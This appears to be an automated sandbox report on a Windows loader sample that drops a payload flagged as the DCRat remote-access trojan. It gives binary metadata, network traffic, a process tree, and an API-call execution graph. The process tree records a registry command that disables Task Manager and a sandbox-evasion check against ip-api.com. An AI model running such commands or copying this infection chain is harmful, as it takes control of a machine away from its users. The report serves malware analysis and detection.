            • [C++] VS2015 UPD3.1 build 24215
            • [EXP] VS2015 UPD3.1 build 24215
            • [RES] VS2015 UPD3 build 24213
            • [LNK] VS2015 UPD3.1 build 24215

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
            IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000x46968.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000x2268.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x630000x469680x46a00689074b903b57cab01c40570dcd31615False0.1629563053097345data5.534485528882311IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0xaa0000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountryZLIB Complexity
            PNG0x635240xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
            PNG0x6406c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
            RT_ICON0x656180x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 3779 x 3779 px/m0.12666065035358168
            RT_DIALOG0xa76400x286dataEnglishUnited States0.5092879256965944
            RT_DIALOG0xa78c80x13adataEnglishUnited States0.60828025477707
            RT_DIALOG0xa7a040xecdataEnglishUnited States0.6991525423728814
            RT_DIALOG0xa7af00x12edataEnglishUnited States0.5927152317880795
            RT_DIALOG0xa7c200x338dataEnglishUnited States0.45145631067961167
            RT_DIALOG0xa7f580x252dataEnglishUnited States0.5757575757575758
            RT_STRING0xa81ac0x1e2dataEnglishUnited States0.3900414937759336
            RT_STRING0xa83900x1ccdataEnglishUnited States0.4282608695652174
            RT_STRING0xa855c0x1b8dataEnglishUnited States0.45681818181818185
            RT_STRING0xa87140x146dataEnglishUnited States0.5153374233128835
            RT_STRING0xa885c0x446dataEnglishUnited States0.340036563071298
            RT_STRING0xa8ca40x166dataEnglishUnited States0.49162011173184356
            RT_STRING0xa8e0c0x152dataEnglishUnited States0.5059171597633136
            RT_STRING0xa8f600x10adataEnglishUnited States0.49624060150375937
            RT_STRING0xa906c0xbcdataEnglishUnited States0.6329787234042553
            RT_STRING0xa91280xd6dataEnglishUnited States0.5747663551401869
            RT_GROUP_ICON0xa92000x14data1.1
            RT_MANIFEST0xa92140x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665

            Imports

            DLLImport
            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
            gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

            Possible Origin

            Language of compilation systemCountry where language is spokenMap
            EnglishUnited States

            Network Behavior

            Network Port Distribution

            TCP Packets

            TimestampSource PortDest PortSource IPDest IP
            Oct 26, 2024 16:17:11.799597979 CEST4973080192.168.2.4208.95.112.1
            Oct 26, 2024 16:17:11.805083990 CEST8049730208.95.112.1192.168.2.4
            Oct 26, 2024 16:17:11.805145025 CEST4973080192.168.2.4208.95.112.1
            Oct 26, 2024 16:17:11.806296110 CEST4973080192.168.2.4208.95.112.1
            Oct 26, 2024 16:17:11.811549902 CEST8049730208.95.112.1192.168.2.4
            Oct 26, 2024 16:17:12.394113064 CEST8049730208.95.112.1192.168.2.4
            Oct 26, 2024 16:17:12.409466982 CEST4973080192.168.2.4208.95.112.1

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Oct 26, 2024 16:17:11.783951044 CEST4928053192.168.2.41.1.1.1
            Oct 26, 2024 16:17:11.792649031 CEST53492801.1.1.1192.168.2.4

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Oct 26, 2024 16:17:11.783951044 CEST192.168.2.41.1.1.10x7d80Standard query (0)ip-api.comA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Oct 26, 2024 16:17:11.792649031 CEST1.1.1.1192.168.2.40x7d80No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
            Oct 26, 2024 16:17:20.114623070 CEST1.1.1.1192.168.2.40x847cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
            Oct 26, 2024 16:17:20.114623070 CEST1.1.1.1192.168.2.40x847cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • ip-api.com

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449730208.95.112.1807008C:\blockcomwinsavescrt\containercomponentSaves.exe
            TimestampBytes transferredDirectionData
            Oct 26, 2024 16:17:11.806296110 CEST80OUTGET /line/?fields=hosting HTTP/1.1
            Host: ip-api.com
            Connection: Keep-Alive
            Oct 26, 2024 16:17:12.394113064 CEST174INHTTP/1.1 200 OK
            Date: Sat, 26 Oct 2024 14:17:12 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 5
            Access-Control-Allow-Origin: *
            X-Ttl: 60
            X-Rl: 44
            Data Raw: 74 72 75 65 0a
            Data Ascii: true


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:10:16:58
            Start date:26/10/2024
            Path:C:\Users\user\Desktop\loader.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\loader.exe"
            Imagebase:0x100000
            File size:2'040'097 bytes
            MD5 hash:F462FD11CEDA48487DB07C5B70410DAC
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            General

            Target ID:1
            Start time:10:16:59
            Start date:26/10/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\blockcomwinsavescrt\DKYQpYxB0fjo0It.vbe"
            Imagebase:0x2c0000
            File size:147'456 bytes
            MD5 hash:FF00E0480075B095948000BDC66E81F0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:2
            Start time:10:17:08
            Start date:26/10/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\system32\cmd.exe /c ""C:\blockcomwinsavescrt\jwlZX38GInff6rIBqWRHehXwajI.bat" "
            Imagebase:0x240000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:3
            Start time:10:17:08
            Start date:26/10/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:4
            Start time:10:17:08
            Start date:26/10/2024
            Path:C:\blockcomwinsavescrt\containercomponentSaves.exe
            Wow64 process (32bit):false
            Commandline:"C:\blockcomwinsavescrt\containercomponentSaves.exe"
            Imagebase:0xc10000
            File size:1'490'944 bytes
            MD5 hash:59E330F176AE037DCC65EFC5F7D7859A
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1832418118.0000000013067000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1832051997.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 84%, ReversingLabs
            Reputation:low
            Has exited:true

            General

            Target ID:5
            Start time:10:17:11
            Start date:26/10/2024
            Path:C:\Windows\SysWOW64\reg.exe
            Wow64 process (32bit):true
            Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            Imagebase:0xe20000
            File size:59'392 bytes
            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:9.7%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:9.3%
              Total number of Nodes:1501
              Total number of Limit Nodes:25
              execution_graph 24833 106110 80 API calls 24834 12b710 GetProcessHeap 24836 11be49 108 API calls 4 library calls 22939 11db01 22941 11daaa 22939->22941 22940 11df59 ___delayLoadHelper2@8 19 API calls 22940->22941 22941->22940 24781 11ea00 46 API calls 6 library calls 24837 101f05 126 API calls __EH_prolog 24782 11ec0b 28 API calls 2 library calls 24839 11db0b 19 API calls ___delayLoadHelper2@8 22947 11c40e 22948 11c4c7 22947->22948 22956 11c42c _wcschr 22947->22956 22949 11c4e5 22948->22949 22965 11be49 _wcsrchr 22948->22965 23002 11ce22 22948->23002 22952 11ce22 18 API calls 22949->22952 22949->22965 22952->22965 22953 11ca8d 22954 1117ac CompareStringW 22954->22956 22956->22948 22956->22954 22957 11c11d SetWindowTextW 22957->22965 22962 11bf0b SetFileAttributesW 22964 11bfc5 GetFileAttributesW 22962->22964 22975 11bf25 ___scrt_fastfail 22962->22975 22964->22965 22967 11bfd7 DeleteFileW 22964->22967 22965->22953 22965->22957 22965->22962 22968 11c2e7 GetDlgItem SetWindowTextW SendMessageW 22965->22968 22971 11c327 SendMessageW 22965->22971 22976 1117ac CompareStringW 22965->22976 22977 11aa36 22965->22977 22981 119da4 GetCurrentDirectoryW 22965->22981 22986 10a52a 7 API calls 22965->22986 22987 10a4b3 FindClose 22965->22987 22988 11ab9a 76 API calls ___std_exception_copy 22965->22988 22989 1235de 22965->22989 22967->22965 22969 11bfe8 22967->22969 22968->22965 22983 10400a 22969->22983 22971->22965 22973 11c01d MoveFileW 22973->22965 22974 11c035 MoveFileExW 22973->22974 22974->22965 22975->22964 22975->22965 22982 10b4f7 52 API calls 2 library calls 22975->22982 22976->22965 22978 11aa40 22977->22978 22979 11aaf3 ExpandEnvironmentStringsW 22978->22979 22980 11ab16 22978->22980 22979->22980 22980->22965 22981->22965 22982->22975 23025 103fdd 22983->23025 22986->22965 22987->22965 22988->22965 22990 128606 22989->22990 22991 128613 22990->22991 22992 12861e 22990->22992 23104 128518 22991->23104 22994 128626 22992->22994 23000 12862f pre_c_initialization 22992->23000 22996 1284de _free 20 API calls 22994->22996 22995 12861b 22995->22965 22996->22995 22997 128634 23111 12895a 20 API calls __dosmaperr 22997->23111 22998 128659 HeapReAlloc 22998->22995 22998->23000 23000->22997 23000->22998 23112 1271ad 7 API calls 2 library calls 23000->23112 23003 11ce2c ___scrt_fastfail 23002->23003 23004 11cf1b 23003->23004 23010 11d08a 23003->23010 23118 1117ac CompareStringW 23003->23118 23115 10a180 23004->23115 23008 11cf4f ShellExecuteExW 23008->23010 23016 11cf62 23008->23016 23010->22949 23011 11cf47 23011->23008 23012 11cf9b 23120 11d2e6 6 API calls 23012->23120 23013 11cff1 CloseHandle 23014 11cfff 23013->23014 23015 11d00a 23013->23015 23121 1117ac CompareStringW 23014->23121 23015->23010 23021 11d081 ShowWindow 23015->23021 23016->23012 23016->23013 23018 11cf91 ShowWindow 23016->23018 23018->23012 23020 11cfb3 23020->23013 23022 11cfc6 GetExitCodeProcess 23020->23022 23021->23010 23022->23013 23023 11cfd9 23022->23023 23023->23013 23026 103ff4 __vsnwprintf_l 23025->23026 23029 125759 23026->23029 23032 123837 23029->23032 23033 123877 23032->23033 23034 12385f 23032->23034 23033->23034 23035 12387f 23033->23035 23049 12895a 20 API calls __dosmaperr 23034->23049 23051 123dd6 23035->23051 23038 123864 23050 128839 26 API calls pre_c_initialization 23038->23050 23042 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23043 103ffe GetFileAttributesW 23042->23043 23043->22969 23043->22973 23044 123907 23060 124186 51 API calls 3 library calls 23044->23060 23047 123912 23061 123e59 20 API calls _free 23047->23061 23048 12386f 23048->23042 23049->23038 23050->23048 23052 123df3 23051->23052 23053 12388f 23051->23053 23052->23053 23062 128fa5 GetLastError 23052->23062 23059 123da1 20 API calls 2 library calls 23053->23059 23055 123e14 23082 1290fa 38 API calls __fassign 23055->23082 23057 123e2d 23083 129127 38 API calls __fassign 23057->23083 23059->23044 23060->23047 23061->23048 23063 128fc1 23062->23063 23064 128fbb 23062->23064 23068 129010 SetLastError 23063->23068 23085 1285a9 23063->23085 23084 12a61b 11 API calls 2 library calls 23064->23084 23068->23055 23069 128fdb 23092 1284de 23069->23092 23071 128ff0 23071->23069 23073 128ff7 23071->23073 23099 128e16 20 API calls pre_c_initialization 23073->23099 23074 128fe1 23076 12901c SetLastError 23074->23076 23100 128566 38 API calls _abort 23076->23100 23077 129002 23079 1284de _free 20 API calls 23077->23079 23081 129009 23079->23081 23081->23068 23081->23076 23082->23057 23083->23053 23084->23063 23090 1285b6 pre_c_initialization 23085->23090 23086 1285f6 23102 12895a 20 API calls __dosmaperr 23086->23102 23087 1285e1 RtlAllocateHeap 23088 1285f4 23087->23088 23087->23090 23088->23069 23098 12a671 11 API calls 2 library calls 23088->23098 23090->23086 23090->23087 23101 1271ad 7 API calls 2 library calls 23090->23101 23093 128512 __dosmaperr 23092->23093 23094 1284e9 RtlFreeHeap 23092->23094 23093->23074 23094->23093 23095 1284fe 23094->23095 23103 12895a 20 API calls __dosmaperr 23095->23103 23097 128504 GetLastError 23097->23093 23098->23071 23099->23077 23101->23090 23102->23088 23103->23097 23105 128556 23104->23105 23106 128526 pre_c_initialization 23104->23106 23114 12895a 20 API calls __dosmaperr 23105->23114 23106->23105 23108 128541 RtlAllocateHeap 23106->23108 23113 1271ad 7 API calls 2 library calls 23106->23113 23108->23106 23109 128554 23108->23109 23109->22995 23111->22995 23112->23000 23113->23106 23114->23109 23122 10a194 23115->23122 23118->23004 23119 10b239 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 23119->23011 23120->23020 23121->23015 23130 11e360 23122->23130 23125 10a1b2 23132 10b66c 23125->23132 23126 10a189 23126->23008 23126->23119 23128 10a1c6 23128->23126 23129 10a1ca GetFileAttributesW 23128->23129 23129->23126 23131 10a1a1 GetFileAttributesW 23130->23131 23131->23125 23131->23126 23133 10b679 23132->23133 23141 10b683 23133->23141 23142 10b806 CharUpperW 23133->23142 23135 10b692 23143 10b832 CharUpperW 23135->23143 23137 10b6a1 23138 10b6a5 23137->23138 23139 10b71c GetCurrentDirectoryW 23137->23139 23144 10b806 CharUpperW 23138->23144 23139->23141 23141->23128 23142->23135 23143->23137 23144->23141 24783 11a430 73 API calls 23190 12b731 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24841 11be49 103 API calls 4 library calls 24784 101025 29 API calls pre_c_initialization 23198 109f2f 23199 109f44 23198->23199 23200 109f3d 23198->23200 23201 109f4a GetStdHandle 23199->23201 23205 109f55 23199->23205 23201->23205 23202 109fa9 WriteFile 23202->23205 23203 109f7a 23204 109f7c WriteFile 23203->23204 23203->23205 23204->23203 23204->23205 23205->23200 23205->23202 23205->23203 23205->23204 23207 10a031 23205->23207 23209 106e18 60 API calls 23205->23209 23210 107061 75 API calls 23207->23210 23209->23205 23210->23200 24846 119b50 GdipDisposeImage GdipFree __except_handler4 24786 128050 8 API calls ___vcrt_uninitialize 23932 109b59 23935 109bd7 23932->23935 23936 109b63 23932->23936 23933 109bad SetFilePointer 23934 109bcd GetLastError 23933->23934 23933->23935 23934->23935 23936->23933 23938 11dc5d 23939 11dc2e 23938->23939 23939->23938 23940 11df59 ___delayLoadHelper2@8 19 API calls 23939->23940 23940->23939 24848 11be49 98 API calls 3 library calls 24787 11ec40 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 24788 118c40 GetClientRect 24789 123040 5 API calls 2 library calls 24790 130040 IsProcessorFeaturePresent 24849 11d34e DialogBoxParamW 23952 11d573 23953 11d580 23952->23953 23954 10ddd1 53 API calls 23953->23954 23955 11d594 23954->23955 23956 10400a _swprintf 51 API calls 23955->23956 23957 11d5a6 SetDlgItemTextW 23956->23957 23960 11ac74 PeekMessageW 23957->23960 23961 11acc8 23960->23961 23962 11ac8f GetMessageW 23960->23962 23963 11aca5 IsDialogMessageW 23962->23963 23964 11acb4 TranslateMessage DispatchMessageW 23962->23964 23963->23961 23963->23964 23964->23961 24794 101075 82 API calls pre_c_initialization 24795 115c77 121 API calls __vsnwprintf_l 24797 11fc60 51 API calls 2 library calls 24799 123460 RtlUnwind 24800 129c60 71 API calls _free 22854 11d891 19 API calls ___delayLoadHelper2@8 24803 117090 114 API calls 24804 11cc90 70 API calls 24851 11a990 97 API calls 24852 119b90 GdipCloneImage GdipAlloc 24853 129b90 21 API calls 2 library calls 24854 122397 48 API calls 22857 11d997 22858 11d89b 22857->22858 22860 11df59 22858->22860 22888 11dc67 22860->22888 22862 11df73 22863 11dfd0 22862->22863 22864 11dff4 22862->22864 22865 11ded7 DloadReleaseSectionWriteAccess 11 API calls 22863->22865 22868 11e06c LoadLibraryExA 22864->22868 22870 11e0df 22864->22870 22871 11e0cd 22864->22871 22883 11e19b 22864->22883 22866 11dfdb RaiseException 22865->22866 22867 11e1c9 22866->22867 22907 11ec4a 22867->22907 22868->22871 22872 11e07f GetLastError 22868->22872 22874 11e13d GetProcAddress 22870->22874 22870->22883 22871->22870 22875 11e0d8 FreeLibrary 22871->22875 22876 11e092 22872->22876 22877 11e0a8 22872->22877 22873 11e1d8 22873->22858 22879 11e14d GetLastError 22874->22879 22874->22883 22875->22870 22876->22871 22876->22877 22878 11ded7 DloadReleaseSectionWriteAccess 11 API calls 22877->22878 22880 11e0b3 RaiseException 22878->22880 22881 11e160 22879->22881 22880->22867 22881->22883 22884 11ded7 DloadReleaseSectionWriteAccess 11 API calls 22881->22884 22899 11ded7 22883->22899 22885 11e181 RaiseException 22884->22885 22886 11dc67 ___delayLoadHelper2@8 11 API calls 22885->22886 22887 11e198 22886->22887 22887->22883 22889 11dc73 22888->22889 22890 11dc99 22888->22890 22914 11dd15 22889->22914 22890->22862 22893 11dc94 22924 11dc9a 22893->22924 22896 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22897 11df55 22896->22897 22897->22862 22898 11df24 22898->22896 22900 11dee9 22899->22900 22901 11df0b 22899->22901 22902 11dd15 DloadLock 8 API calls 22900->22902 22901->22867 22903 11deee 22902->22903 22904 11df06 22903->22904 22905 11de67 DloadProtectSection 3 API calls 22903->22905 22933 11df0f 8 API calls 2 library calls 22904->22933 22905->22904 22908 11ec53 22907->22908 22909 11ec55 IsProcessorFeaturePresent 22907->22909 22908->22873 22911 11f267 22909->22911 22934 11f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22911->22934 22913 11f34a 22913->22873 22915 11dc9a DloadUnlock 3 API calls 22914->22915 22916 11dd2a 22915->22916 22917 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 22916->22917 22918 11dc78 22917->22918 22918->22893 22919 11de67 22918->22919 22920 11de7c DloadObtainSection 22919->22920 22921 11de82 22920->22921 22922 11deb7 VirtualProtect 22920->22922 22932 11dd72 VirtualQuery GetSystemInfo 22920->22932 22921->22893 22922->22921 22925 11dca7 22924->22925 22926 11dcab 22924->22926 22925->22898 22927 11dcb3 GetModuleHandleW 22926->22927 22928 11dcaf 22926->22928 22929 11dcc9 GetProcAddress 22927->22929 22931 11dcc5 22927->22931 22928->22898 22930 11dcd9 GetProcAddress 22929->22930 22929->22931 22930->22931 22931->22898 22932->22922 22933->22901 22934->22913 24807 10ea98 FreeLibrary 24808 11a89d 78 API calls 24856 125780 QueryPerformanceFrequency QueryPerformanceCounter 22943 101385 82 API calls 3 library calls 24810 12ac0e 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 24811 1016b0 84 API calls 23145 1290b0 23153 12a56f 23145->23153 23149 1290cc 23150 1290d9 23149->23150 23161 1290e0 11 API calls 23149->23161 23152 1290c4 23162 12a458 23153->23162 23156 12a5ae TlsAlloc 23157 12a59f 23156->23157 23158 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23157->23158 23159 1290ba 23158->23159 23159->23152 23160 129029 20 API calls 2 library calls 23159->23160 23160->23149 23161->23152 23163 12a488 23162->23163 23166 12a484 23162->23166 23163->23156 23163->23157 23164 12a4a8 23164->23163 23167 12a4b4 GetProcAddress 23164->23167 23166->23163 23166->23164 23169 12a4f4 23166->23169 23168 12a4c4 __crt_fast_encode_pointer 23167->23168 23168->23163 23170 12a515 LoadLibraryExW 23169->23170 23171 12a50a 23169->23171 23172 12a532 GetLastError 23170->23172 23173 12a54a 23170->23173 23171->23166 23172->23173 23174 12a53d LoadLibraryExW 23172->23174 23173->23171 23175 12a561 FreeLibrary 23173->23175 23174->23173 23175->23171 23176 12a3b0 23177 12a3bb 23176->23177 23179 12a3e4 23177->23179 23180 12a3e0 23177->23180 23182 12a6ca 23177->23182 23189 12a410 DeleteCriticalSection 23179->23189 23183 12a458 pre_c_initialization 5 API calls 23182->23183 23184 12a6f1 23183->23184 23185 12a70f InitializeCriticalSectionAndSpinCount 23184->23185 23188 12a6fa 23184->23188 23185->23188 23186 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23187 12a726 23186->23187 23187->23177 23188->23186 23189->23180 24812 121eb0 6 API calls 3 library calls 24858 1279b7 55 API calls _free 24814 1276bd 52 API calls 3 library calls 24816 1096a0 79 API calls 24861 12e9a0 51 API calls 24819 11e4a2 38 API calls 2 library calls 24820 11acd0 100 API calls 24863 1119d0 26 API calls std::bad_exception::bad_exception 23213 11ead2 23214 11eade ___scrt_is_nonwritable_in_current_image 23213->23214 23239 11e5c7 23214->23239 23216 11eae5 23218 11eb0e 23216->23218 23319 11ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 23216->23319 23226 11eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23218->23226 23250 12824d 23218->23250 23222 11eb2d ___scrt_is_nonwritable_in_current_image 23223 11ebad 23258 11f020 23223->23258 23226->23223 23320 127243 38 API calls 2 library calls 23226->23320 23234 11ebd9 23236 11ebe2 23234->23236 23321 12764a 28 API calls _abort 23234->23321 23322 11e73e 13 API calls 2 library calls 23236->23322 23240 11e5d0 23239->23240 23323 11ed5b IsProcessorFeaturePresent 23240->23323 23242 11e5dc 23324 122016 23242->23324 23244 11e5e1 23249 11e5e5 23244->23249 23333 1280d7 23244->23333 23247 11e5fc 23247->23216 23249->23216 23253 128264 23250->23253 23251 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23252 11eb27 23251->23252 23252->23222 23254 1281f1 23252->23254 23253->23251 23255 128220 23254->23255 23256 11ec4a __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 23255->23256 23257 128249 23256->23257 23257->23226 23425 11f350 23258->23425 23261 11ebb3 23262 12819e 23261->23262 23427 12b290 23262->23427 23264 11ebbc 23267 11d5d4 23264->23267 23266 1281a7 23266->23264 23431 12b59a 38 API calls 23266->23431 23552 1100cf 23267->23552 23271 11d5f3 23601 11a335 23271->23601 23273 11d5fc 23605 1113b3 GetCPInfo 23273->23605 23275 11d606 ___scrt_fastfail 23276 11d619 GetCommandLineW 23275->23276 23277 11d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23276->23277 23278 11d628 23276->23278 23279 10400a _swprintf 51 API calls 23277->23279 23638 11bc84 81 API calls 23278->23638 23281 11d70d SetEnvironmentVariableW GetModuleHandleW LoadIconW 23279->23281 23608 11aded LoadBitmapW 23281->23608 23282 11d62e 23283 11d6a0 23282->23283 23284 11d636 OpenFileMappingW 23282->23284 23640 11d287 SetEnvironmentVariableW SetEnvironmentVariableW 23283->23640 23286 11d696 CloseHandle 23284->23286 23287 11d64f MapViewOfFile 23284->23287 23286->23277 23291 11d660 __vsnwprintf_l 23287->23291 23292 11d68d UnmapViewOfFile 23287->23292 23639 11d287 SetEnvironmentVariableW SetEnvironmentVariableW 23291->23639 23292->23286 